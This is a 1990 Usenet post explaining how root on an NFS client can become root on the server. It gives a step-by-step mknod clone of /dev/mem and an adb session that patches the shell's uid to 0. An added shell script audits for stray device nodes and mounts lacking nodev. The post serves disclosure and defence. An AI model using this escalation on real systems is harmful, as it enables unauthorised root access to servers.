Path: utzoo!censor!geac!torsqnt!news-server.csri.toronto.edu!cs.utexas.edu!sun-barr!newstop!texsun!convex!convex.COM
From: tchrist@convex.COM (Tom Christiansen)
Newsgroups: comp.unix.internals
Subject: Re: becoming root via NFS
Message-ID: <111544@convex.convex.com>
Date: 16 Dec 90 23:13:06 GMT
References: <1990Dec7.171501.18028@mp.cs.niu.edu> <4627@pkmab.se> <4088@osc.COM>
Sender: news@convex.com
Reply-To: tchrist@convex.COM (Tom Christiansen)
Organization: CONVEX Software Development, Richardson, TX
Lines: 56

From the keyboard of strick@osc.com (henry strickland):
:In the normal NFS setup, making myself root on a workstation does not
:give me root privileges on the filesystem of a remote NFS server which
:I can mount the partitions of.  But I can easily be any other user or
:any group I want on that remote partition, including daemon, bin, uucp,
:kmem, wheel, operator, audit, etc.  Since this is so easy, we have to
:set our goals to being root on the server. ;-)  Now if any of these
:non-root users owns (or groups have w bits on) some file in the PATH of
:root (or one of the directories or superdirectories in the PATH), the
:trojan horse can ride.

It's really pretty easy to become root on the server if you can become
root on the workstation.  Become a non-root user who can create a
directory.  Create a directory on the server that's mode 777.  Now go
back to root and go to this directory, which you can write although the
files will be owned by user ((unsigned short) -2).  Do a mknod giving it
the major,minor numbers of /dev/mem on the server, not the workstation.
Make it mode 666.  Return to the server as a normal user, adb your new
/dev/mem device and scribble at will.  My favorite scribble is to punch
the uid of my shell to be 0 in the proc structure.

For example, here is some code that does that on my system:

    % whoami
    tchrist
    % pstat -tP $$                          <- find this guy's proc addr
    PROC S K THREAD S F ID SLPQH WCHAN RESCHFP
    tcsh 3b9ab8 S 1 5a5760 s 2 0 24e0d0 a1eb000 b4f4d74
    % adb -w -k /vmunix personal_mem_device
    (adb) 3b9ab8+44/w                       <- now find his user addr
    0x3b9afc:       a1eb000
    (adb) 3b9ab8+58c/h                      <- check out our user id
    0x3ba048:       356
    (adb) ./h= 0                            <- setuid the way Real Programmers do it
    0x3ba048:       356     =       0
    (adb) $q
    % whoami
    root

Of course, finding the right offsets is a little tiny bit of work maybe,
but I've a program that dumps C structure offsets, so it's not too rough.

Some people are going to tell me I shouldn't have explained this, but
that's not going to help anything.  Security through obscurity isn't.

Now you may better understand my .signature. :-)

--tom
--
Tom Christiansen                       tchrist@convex.com      convex!tchrist
"With a kernel dive, all things are possible, but it sure makes it hard
to look at yourself in the mirror the next morning."  -me
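The attack above leaves two things an administrator can look for: a block or character special file sitting outside /dev on an exported filesystem, and a filesystem mounted without the nodev option, which is what lets the kernel honour a planted /dev/mem clone in the first place. The following audit helper is an added example, not code from Tom's post or from any of the systems it mentions; it assumes a mount table in /proc/mounts format ("device mountpoint fstype options dump pass", one mount per line) on stdin, and the two function names and the exempt filesystem-type list are my own choices.

```shell
#!/bin/sh
# Audit helpers for the "mknod a /dev/mem clone over NFS" trick.
# Added example, not from the original post. Assumes POSIX sh, find(1)
# with -xdev, and a /proc/mounts-style mount table on stdin.

# stray_device_nodes DIR
#   Print (ls -ld style) every block/char special on the filesystem
#   holding DIR that does not live under /dev. A 0666 device node in a
#   mode-777 directory on an exported filesystem is exactly the artifact
#   the attack leaves behind. -xdev keeps find on one filesystem so an
#   NFS mount or /proc is not crawled by accident.
stray_device_nodes() {
    find "$1" -xdev \( -type b -o -type c \) \
        ! -path '/dev' ! -path '/dev/*' \
        -exec ls -ld {} \; 2>/dev/null
}

# mounts_without_nodev
#   Read /proc/mounts-format lines on stdin and print each mount point
#   whose option list lacks "nodev". On such a filesystem the kernel will
#   happily open a planted special file as the real device. Kernel
#   pseudo-filesystems that cannot hold user-created nodes are skipped;
#   tmpfs is deliberately NOT skipped because /tmp is usually 1777.
mounts_without_nodev() {
    while read -r dev mnt fstype opts rest; do
        [ -n "$mnt" ] || continue            # ignore blank lines
        case "$fstype" in
            proc|sysfs|devpts|devtmpfs|cgroup|cgroup2|securityfs|debugfs|pstore|bpf)
                continue ;;
        esac
        case ",$opts," in
            *,nodev,*) ;;                    # protected: nothing to report
            *) printf '%s\n' "$mnt" ;;       # exposed: report it
        esac
    done
}

# Typical use (run as root so find can enter every directory):
#   mounts_without_nodev < /proc/mounts
#   stray_device_nodes /export
```

Run mounts_without_nodev against the server's live mount table and stray_device_nodes against each exported tree. Any mount point reported by the first check that an NFS client can write to, and any special file reported by the second, deserves a look before the next "whoami" on the server says root.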